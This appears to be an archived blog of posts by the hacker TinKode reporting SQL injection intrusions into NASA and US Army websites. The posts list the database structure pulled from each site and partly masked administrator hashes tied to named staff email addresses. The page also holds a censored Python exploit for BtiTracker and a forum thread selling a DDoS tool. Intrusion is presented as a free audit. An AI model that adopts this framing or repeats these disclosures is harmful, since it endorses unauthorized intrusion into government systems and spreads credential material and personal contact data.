TinKode-NASA Full-Disclosure! AGAIN

NASA Full-Disclosure! AGAIN

Posted by isrtinkode on February 19, 2010

 _   _                      _               _
| \ | | __ _ ___  __ _     / \   __ _  __ _(_)_ __
|  \| |/ _` / __|/ _` |   / _ \ / _` |/ _` | | '_ \
| |\  | (_| \__ \ (_| |  / ___ \ (_| | (_| | | | | |
|_| \_|\__,_|___/\__,_| /_/   \_\__, |\__,_|_|_| |_|
                                |___/

              #Full Disclosure... c0de.breaker

#Important
Ok. First of all, the reason I made this SQLi public ( even though I had no intention to make this ) , is because I found out that somebody else discovered the vulnerable parameter.I found this SQLi 3 months ago.
# Why do I test websites?
Because it is my hobby , and I want to prove that even the big websites, which should be highly secured, can be hacked. This is the reality , and it makes me sad.I feeling alright about what I’m doing, because if anyone finds a vulnerability before me , he/she could use it in harmful ways such as: shelling , rooting , backdooring , deleting etc

The WebSite Vulnerable: http://saif-1.larc.nasa.gov (CEOS Systems Analysis Database)

Testing:

Informations:

#Version: 5.1.31-community
#User: *******
#Main Database: *******
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\

Also, the magic_quotes_gpc=OFF, and “user” from mysql have all privileges:

Bad…

Other Databases:

#ceossadb
#information_schema
#mysql
#ceosvis

Tables from “ceosvis” database:

#instrument
#takes
#measurement
#contains
#mission

Tables from main Database:

#agency
#alt_names
#cat_measurements
#cat_missions
#cat_series
#cat_wavebands
#ceosdbversion
#constellations
#data_access_links
#db_update_phases
#ecv
#instr
#instr_agencies
#instr_desc
#instr_geometry
#instr_maturity
#instr_mission
#instr_res_swath_temp
#instr_sampling
#instr_status
#instr_status_biz
#instr_technology
#instr_technology_rawdata
#instr_type
#instr_waveband
#mappedor1
#measurement_confidence
#measurement_desc
#measurement_type
#measurementtypesconfidencepilot
#measurementtypespending
#method
#mission_agencies
#mission_status
#missions
#obs_requirments
#orbit_sense
#orbit_type
#requirements
#series
#series_agency
#series_missions
#societal_benefits
#sys_diagrams
#taxonomy
#typeatmosphere
#typereqapplication
#typerequirementsource
#typesmeasurementsconfidencepilot
#wmo_measurement

I made this public, because I saw the website down, and I think the administrators will fix the vulnerability once someone reports the problem. (sorry because i didn’t make this first, if was that)

Read More

TinKode-NASA vulnerable to MSSQL Injection

NASA vulnerable to MSSQL Injection

Posted by isrtinkode on February 19, 2010

 _   _                   __  __  _____ _____  ____  _      _
| \ | |                 |  \/  |/ ____/ ____|/ __ \| |    (_)
|  \| | __ _ ___  __ _  | \  / | (___| (___ | |  | | |     _
| . ` |/ _` / __|/ _` | | |\/| |\___ \\___ \| |  | | |    | |
| |\  | (_| \__ \ (_| | | |  | |____) |___) | |__| | |____| |
|_| \_|\__,_|___/\__,_| |_|  |_|_____/_____/ \___\_\______|_|

   #Nasa vulnerable again (MSSQLi)@c0de.breaker

Hello, unfortunately I found another serious vulnerability in NASA, more precisely a MSSQL Injection .
I admit that, this time it was harder to make the injection.
It is the forth time this happens, but nothing can surprise me anymore. As always, I showed no interest in the content of the website.
I hope this is the last time I see these kinds of vulnerabilities.
Link: www.gltrs.grc.nasa.gov
Testing:

As you can see, this time I didn’t hide the vulnerable parameter, mainly because it can be easily found on google with filetype:aspx.

Main Informations:

#Version: Microsoft SQL Server
#Operating system: Windows
#Web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.7
#Main Database: RDP
#Current User: RDP_Ext_RA

Tables from main database “RDP”:

#Abstract
#Author
#AuthorTypeLookup
#RDPLibrary
#RDPTemp
#ReportTemplateLookup
#ReportTypeLookup
#RptTempDistLookup
#RDP

All databases (92):

#AdventureWorks
#AppSecAdmin
#COD
#CODAppsAdmin
#CODSecurity
#Cont_999
#ContractMgmt
#CopierMDSTool
#CostRecovery
#DivAppSec
#DivisionInfo
#DivSurveys
#dnn-ltid
#dnn-metrology
#Eform
#EventSentry
#EventSentry_ext
#EventSentry_int
#FoodServices
#FormsMgmt
#FurnitureInventory
#Grants
#GRCHistory
#InstPool
#ITC
#ITCImagenet
#ITSInfo
#ITSProjectMgmt
#Library
#LibraryPatronReq
#Logistics
#LTIDLookup
#LTOCSecurity
#LVSS
#master
#metafldr
#Metcal
#Moc1Archives
#model
#msdb
#MTS
#nasath
#Northwind
#NPTRegistration
#PDOInventory
#Phone
#Projects
#PTF-HST-GHC
#PTF-HST-PSL
#PTF-ITC-AWT
#PTF-ITC-C_Archive
#PTF-ITC-CM_Archive
#PTF-ITC-Constellation
#PTF-ITC-Facilities
#PTF-ITC-ITC2_Rotocraft
#PTF-ITC-ITC4_GAGroundIcing
#PTF-ITC-ITC6_MarketingProject
#PTF-ITC-ITC0_CEV_Model
#PTF-ITC-NPTAssets
#PTF-ITC-Ohio_VIP
#PTF-ITC-Orion
#PTF-ITC-PBRF_RFP
#PTF-ITC-Template
#Publishing
#pubs
#pwots
#RDP
#RecordsMgmt
#ReportServer
#ReportServerTempDB
#RetireeReg
#RollCall
#ServerAdmin
#ServReqMgmt
#Sharepoint
#SPS
#SupplyMgmt
#tempdb
#TIALSPurchasing
#TMP2_MTS
#VTWinNASA
#WorkMgmt
#WSS-BRehab
#WSS-custodialservices
#WSS-ITC-MTPV
#WSS-ITS
#WSS-LTID
#WSS-LTIDWebAdmin
#WSS-PubsMgmt
#WSS-TIALS
#WSS-TIALSExecRpts
#WSS-webredesign

As a last remark:
I hope my findings aren’t all for nothing, and that NASA will do a complete inspection on all their websites.

Read More

TinKode-NASA website security issues

NASA website security issues

Posted by isrtinkode on February 19, 2010

     _   _           _____
    | \ | |   /\    / ____|  /\
    |  \| |  /  \  | (___   /  \
    | . ` | / /\ \  \___ \ / /\ \
    | |\  |/ ____ \ ____) / ____ \
    |_| \_/_/    \_\_____/_/    \_\
      #TinKode@Romania

            The Center for Aerosol Research at NASA's Goddard Space Flight Center

                                    

The Goddard Space Flight Center (GSFC) is a major NASA space research laboratory established on May 1, 1959 as NASA’s first space flight center. GSFC employs approximately 10,000 civil servants and contractors, and is located approximately 6.5 miles (10.5 km) northeast of Washington, D.C. in Greenbelt, Maryland, USA. GSFC, one of ten major NASA field centers, is named in recognition of Dr. Robert H. Goddard (1882-1945), the pioneer of modern rocket propulsion in the United States.

Vulnerable website: http://aerocenter.gsfc.nasa.gov

I want to say that it was very hard to make this injection…
The webserver had good protection but wasn’t fully secured.
This kind only works manually , you can’t do it with apps.

In this picture you can see the visible columns:

Main informations:

#Version:5.0.82-log
#User:carwww@localhost
#Database:aerocenter
#Datadir:/var/mysql/

Here we can see all databases:

[1] information_schema
[2] aerocenter
[3] car
[4] test

In this screenshot are all tables from all databases:

I don’t know exactly from which database are the tables… so I think I have not split them very well

Tables from “aerocenter” database:

[1] files
[2] milagro_users
[3] modis_wshop
[4] news
[5] news_files
[6] personnel
[7] siteupdate
[8] test
[9] users
[10] workshop_files
[11] yoram2007
[12] yoram2007_agenda

Tables from “car” database:

[1] car_content
[2] car_data_info
[3] car_data_missions
[4] car_data_overview
[5] car_data_quicklooks
[6] car_files
[7] car_homefeature
[8] car_homefeature_title
[9] car_homeimage
[10] car_homemission
[11] car_images
[12] car_news
[13] car_news_files
[14] car_pers_ordering
[15] car_personal_pages
[16] car_personnel
[17] car_publications,
[18] car_publications_authors
[19] car_publications_coauthors
[20] car_sections
[21] car_siteupdate
[22] car_subsections
[23] car_users

Tables from “test” database:

[1] content
[2] homeimage
[3] hometext
[4] images
[5] news
[6] news_files
[7] personnel
[8] publications
[9] publications_authors
[10] publications_coauthors
[11] sections
[12] siteupdate
[13] subsections
[14] users

Columns from all databases:

Here we have the same situation like with tables…

[1] filename
[2] title
[3] user
[4] actualname
[5] firstname
[6] lastname
[7] username
[8] userpassword
[9] userlevel
[10] status
[11] email
[12] phone
[13] affiliation
[14] focusgroup
[15] flag
[16] date_entered
[17] event_date
[18] time
[19] location
[20] art_title
[21] talk_title
[22] art_content
[23] article_id
[24] rank
[25] cal_lastname
[26] cal_firstname
[27] cal_middlename
[28] cal_email
[29] fax
[30] su_content
[31] last_updated
[32] badge
[33] citizen
[34] country
[35] content
[36] ordering
[37] section_title
[38] subsection_title
[39] header
[40] link_text_before
[41] linked_text
[42] link_url
[43] link_text_after
[44] html
[45] mission_id
[46] flight_number
[47] date
[48] time_flight
[49] time_data
[50] aircraft_type
[51] flight_scientist
[52] lat_long
[53] flight_map_lg
[54] modis_img_lg
[55] goes_img
[56] details
[57] flight_schedule
[58] anim_img_type
[59] static_img_type
[60] modis_credit
[61] flight_track_credit
[62] quicklook_credit
[63] details_credit
[64] modis_anim
[65] modis_aqua
[66] modis_terra
[67] goes_utc
[68] kmz_file
[69] mission_name
[70] year
[71] objective
[72] logo
[73] logo_width
[74] logo_height
[75] table_number
[76] data
[77] flight_num
[78] img_sm
[79] img_lg
[80] content_id
[81] image
[82] image_alt
[83] image_align
[84] active
[85] feature_title
[86] image_caption
[87] image_large
[88] id_ordering
[89] order_id
[90] page_id
[91] pers_id
[92] middlename
[93] profile_active
[94] profile_img
[95] class
[96] onlinestatus
[97] classification
[98] monthdays
[99] found_in
[101] eds
[102] publication
[103] volume
[104] issue
[105] pages
[106] pub_id
[107] author
[108] lab_member_auth
[109] coauthors
[110] lab_member_coauth
[111] sectionTitile
[112] parentSection
[113] cal_login
[114] cal_passwd
[115] profile
[116] profile_img1
[117] profile_img2

Admins accounts:

g****sa:****bb*******8418dfce03f42193***:ghalusa@climate.gsfc.nasa.gov
m***gro:****a4343e0f1c5************0be96:ghalusa@climate.gsfc.nasa.gov
g***usa:ee***81bd*****2baa934eb571c*****:Goran.N.Halusa@gsfc.nasa.gov
kl***man:34a9dbef0*****86d1b71f6662c*****:Richard.Kleidman@nasa.gov
lr***er:******76c7041eae26695ec259aa*****1:Lorraine.A.Remer@nasa.gov
p***ul:**********3f3529e02ff313dcaf49ce*****:paul.d.przyborski@nasa.gov
l****y:*************1fb629d312948e9642f95df*****:Robert.C.Levy@nasa.gov

These hashes are md5() and they can be easily cracked.
Bye, TinKode! 

Read More

TinKode-US Army full disclosure

US Army full disclosure

Posted by isrtinkode on February 19, 2010

                                                                         _
                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/
                                              #full disclosure@c0de.breaker

#Informations:
First Army was established on August 10, 1918 as a field army when sufficient American military manpower had arrived in France during World War I. As an element of the American Expeditionary Force (AEF) in the latter stages of World War I it was the first of three field armies established under the AEF. Serving in its ranks were many figures who later played important roles in World War II. First Army was inactivated in April 1919.

Few time ago I found a website vulnerable to MSSQL Injection (www.onestop.army.mil)… But today I tested another website, and in 2 minutes i found a vulnerable parameter.
Vulnerable link: www.first.army.mil

Testing:

Main Informations:

#Version: Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
#User: Vacancyuser
#Principal Database: FirstArmyVacancies
#Server Name: GIcensoredL02
#Server: Microsoft-IIS/6.0

Version:

All databases from webserver:

[1] FirstArmyVacancies
[2] master
[3] tempdb
[4] model
[5] msdb
[6] ReportServer
[7] ReportServerTempDB
[8] gis_production
[9] 1st_Army_East
[10] FirstArmy_ATLevel_Training
[11] BESMgmt3
[12] 68W
[13] FirstArmy_Common
[14] G5MOB
[15] SpotlightManagementFramework
[16] HQ_Apps
[17] SurgeonsCTT
[18] TrainingOperationsPlanner
[19] UnitMilestone
[20] WheelsUpDown
[21] GFI
[22] CommandersTrainingTool
[23] NetPerfMon
[24] fsweb

Tables from “fsweb” database:

[1] Categories
[2] BuddyList
[3] ApptTypes
[4] DistanceList
[5] AppointmentBook_Properties
[6] AppointmentBook_Locations
[7] Appointmentbook_Holidays
[8] AppointmentBook
[9] AliasChart
[10] Abreviations
[11] UserActivityLog
[12] websafeFONTS
[13] PortalPageContent
[14] ValidFileTypes
[15] VerificationQuestions
[16] websafeFontSize
[17] Ziplist
[18] TimeSchedule
[19] POC
[20] SystemClearance
[21] CELL_CONFTABLE
[22] Messages
[23] States
[24] PortalPageData
[25] portalMENUS
[26] PortalGroups

Columns from table_name “POC”

[1] UserName
[2] ClientID
[3] PortalWebsite
[4] Prefix
[5] FirstName
[6] MiddleName
[7] LastName
[8] Suffix
[9] Email
[10] regEmail
[11] Expertise
[12] Fax
[13] City
[14] State
[15] Zip
[16] DisplayZip
[16] Address1
[17] Address2
[18] Phone
[19] Cell
[20] Author
[21] Password
[22] ClearanceLevel
[23] Notes
[24] BranchofService
[25] Ext
[26] RegistrationNumber
[27] LastLogin
[28] FailedLogins
[29] ActiveLogins
[30] VerificationQuestion1
[31] VerificationResponse1
[32] VerificationQuestion2

I want to say, i didn’t extract anything from any database like username,passwords,adresses,etc

Read More

ISR Trinity Bomb DDoS Tool-Discutie pe forum

Nu am spus nici unde ca sursa e facuta de mine de la 0, doar ca nu e una singura, e facut din vreo 3,4 surse combinate. Daca esti asa de bun, iti poti face si tu unul asemanator, nimeni nu are ceva impotriva. Dar nu inteleg ce te f*** pe matale grija ce face altul? Stai in p*** mea in banca ta si daca nu iti place, intra in alt thread.
           
@ censored
1. Da
2. Nu

@ censored
Nu!
...................................................................................................................................................................

 Originally Posted by TinKode 
@censored
Nu am spus nici unde ca sursa e facuta de mine de la 0, doar ca nu e una singura, e facut din vreo 3,4 surse combinate. Daca esti asa de bun, iti poti face si tu unul asemanator, nimeni nu are ceva impotriva. Dar nu inteleg ce te f*** pe matale grija ce face altul? Stai in p*** mea in banca ta si daca nu iti place, intra in alt thread.

@ censored
1. Da
2. Nu

@ censored
Nu!

De unde pot sa descarc programul asta ?
...................................................................................................................................................................
 Originally Posted by  censored 10 
@TinKode ,Se pare ca esti unul din ala teribilist.Tu altfel nu stii sa vorbesti?
Asa imi place mie sa vorbesc cu persoanele care ma *** la cap, sunt mai pasnic de felul meu.

@ censored  Nu ai de unde. E privat. Money Money daca il vrei!
...................................................................................................................................................................

@TinKode,man chill.Nu e nevoie de injurii si de alte ca****ri.Numa ca lumea are dreptul la informatie.Frumos e sa faci public daca tot demonstrezi ceva..


@ censored ,stai linistit ca e testat de altii si merge prea bine.

---

Keywords: NEWS, Razvan Manole Cernacianu, TinKode, TinKode Hack Tool, TinKode Hacker,ISR Trinity Bomb DDoS Tool,Discutie pe forum.

---

Read More

TinKode-Youtube HTML Code Injection - InSecurity.RO

Read More

TinKode-Youtube Defaced and Redirected Insecurity.ro

Read More

TinKode-Google XSS - HTML Code Injection

Read More

TinKode-Translate.Google.Com XSS @ InSecurity.Ro

Read More

TinKode-BtiTracker 1.3.x – 1.4.x Exploit [Python]

BtiTracker 1.3.x – 1.4.x Exploit [Python]

Posted by: TinKode

Date: June 09, 2010 07:37PM

BtiTracker 1.3.x – 1.4.x Exploit

#!/usr/bin/env python# 
################################################################################
# ______           ____                                      __      [ xpl0it ] #
#/\__  _\        /\   _`\                                 __/\ \__              #
#\/_/\ \/     ___\ \,\L\_\     __    ___   __   __  _ __ /\_\ \ ,_\  __  __     #
#   \ \ \   /' _ `\/_\__ \   /'__`\ /'___\/\ \/\  \/\`'__\/\ \ \ \/ /\ \/\ \    #
#    \_\ \__/\ \/\ \/\ \L\ \/\  __//\ \__/\ \  \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \   #
#    /\_____\ \_\ \_\ `\____\ \____\ \____\\  \____/\ \_\  \ \_\ \__\\/`____ \  #
#    \/_____/\/_/\/_/\/_____/\/____/\/____/  \/___/  \/_/   \/_/\/__/ `/___/> \ #
#                                                    _________________   /\___/ #
#                                                    www.insecurity.ro   \/__/  #
#                                                                               # 
################################################################################  
#                    [  BtiTracker 1.3.X - 1.4.X Exploit ]                      # 
#    Greetz: daemien, Sirgod, Puscas_Marin,  AndrewBoy, Ras, HrN, vilches       #
#    Greetz: excess, E.M.I.N.E.M, flo flow,  paxnWo, begood, and ISR Staff      # 
################################################################################  
#                    Because we care, we're security aware                      # 
################################################################################  
 
import sys, urllib2, re
  
if len(sys.argv) < 2:
    print "==============================================================="
    print "============== BtiTracker 1.3.X - 1.4.X Exploit  ==============="
    print "==============================================================="
    print "=               Discovered and coded by  TinKode               ="     
    print "=                      www.InSecurity.ro                       ="
    print "=                                                              ="
    print "= Local  Command:                                              ="
    print "= ./isr.py [http://webshit]  [ID]                              ="
    print "=                                                              ="
    print "==============================================================="
    exit()
  
if Censored
    id = 1
else:
    id = censored
  
shitcensored
censored
 censored
  
url  censored
censored
censored
print "\n"
print "============================================="
print "=================  InSecurity ================"
print "============================================="
  
html  = censored
censored =  censored
if  len(slobod)  > 0:
    print "ID       : "  + str(id)
    print "Username : " +  censored
    print "Password : " +  censored
    print "EMail    : " +  censored
    print "============================================="
    print "================= InSecurity ================"
    print "============================================="
else:
    print "censored..."
     
#InSecurity.ro - Romania

Read More

TinKode-Database disclosure www.insecurity.ro

Read More

TinKode-ISR Trinity Bomb DDoS Tool

Read More

vBulletin 4.x - 4.1.2 exploit

Read More

Mircea Badea & TinKode (TV)

Read More

TinKode - TV - NeptunTV (NASA)

Read More

TinKode - TV - British Forces News (MOD UK - Royal Navy)

Read More

TinKode-Nasa

Read More

TinKode - Facebook XSS

Read More

TinKode-MySQL.com and Sun/Oracle Haked

Read More

TinKode-hacks into NASA servers

NOTE:

Until now, no. I don't do bad things. I only find and make public the info. Afterwards I send an email to them to fix the holes. It's like an security audit, but for free.

Read More